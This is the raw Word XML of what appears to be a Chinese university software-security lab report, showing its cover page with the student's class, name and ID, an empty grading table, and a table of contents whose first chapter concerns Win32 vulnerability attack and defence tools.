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616" w:beforeLines="150"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc164150354"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="616" w:beforeLines="150"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="616" w:beforeLines="150"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>“软件安全”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>实验报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2100"/>
        </w:tabs>
        <w:spacing w:before="411" w:beforeLines="100"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2100"/>
        </w:tabs>
        <w:spacing w:before="411" w:beforeLines="100"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2100"/>
        </w:tabs>
        <w:spacing w:before="411" w:beforeLines="100"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2100"/>
        </w:tabs>
        <w:spacing w:before="411" w:beforeLines="100"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2100"/>
        </w:tabs>
        <w:spacing w:before="411" w:beforeLines="100"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>班    级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>信安1901班</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>　　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:spacing w:val="281"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:fitText w:val="1124" w:id="0"/>
        </w:rPr>
        <w:t>姓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:fitText w:val="1124" w:id="0"/>
        </w:rPr>
        <w:t>名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>李欣宇</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b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>　　　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:spacing w:val="281"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:fitText w:val="1124" w:id="1"/>
        </w:rPr>
        <w:t>学</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:fitText w:val="1124" w:id="1"/>
        </w:rPr>
        <w:t>号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>U201911658</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b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>　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pP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1"/>
        <w:gridCol w:w="1283"/>
        <w:gridCol w:w="1195"/>
        <w:gridCol w:w="2126"/>
        <w:gridCol w:w="1134"/>
        <w:gridCol w:w="13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891" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/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项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1283" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>撰写规范</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1195" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>实验过程</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>问题分析与小结</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>总分</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>教师签字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91" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="both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分值</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1283" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="both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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1195" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="both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50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="both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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="both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100</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b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91" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="205" w:beforeLines="50"/>
              <w:jc w:val="both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评分</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1283" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1195" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:footerReference r:id="rId3" w:type="default"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1985" w:right="1418" w:bottom="1701" w:left="1418" w:header="851" w:footer="992" w:gutter="0"/>
          <w:pgNumType w:fmt="upperRoman" w:start="1" w:chapSep="period"/>
          <w:cols w:space="425" w:num="1"/>
          <w:docGrid w:type="linesAndChars" w:linePitch="411" w:charSpace="-2714"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="411" w:after="411"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc164240109"/>
      <w:bookmarkStart w:id="2" w:name="_Toc164850838"/>
      <w:bookmarkStart w:id="3" w:name="_Toc54025130"/>
      <w:bookmarkStart w:id="4" w:name="_Toc164847384"/>
      <w:r>
        <w:t>目　录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/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TOC \o "1-2" \h \z \u</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22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"_Toc54025130"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</w:rPr>
        <w:t>目　录</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc54025130 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22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"_Toc54025131"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</w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>Win32漏洞攻防工具使用与实例分析</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc54025131 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22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"_Toc54025132"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</w:rPr>
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
        </w:rPr>
        <w:t>实验目的</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc54025132 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22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"_Toc54025133"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</w:rPr>
        <w:t>1.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
        </w:rPr>
        <w:t>实验要求</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc54025133 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22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"_Toc54025134"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</w:rPr>
        <w:t>1.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
        </w:rPr>
        <w:t>实验环境</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc54025134 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22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"_Toc54025135"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</w:rPr>
        <w:t>1.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
        </w:rPr>
        <w:t>实验过程记录</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc54025135 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22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"_Toc54025136"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</w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
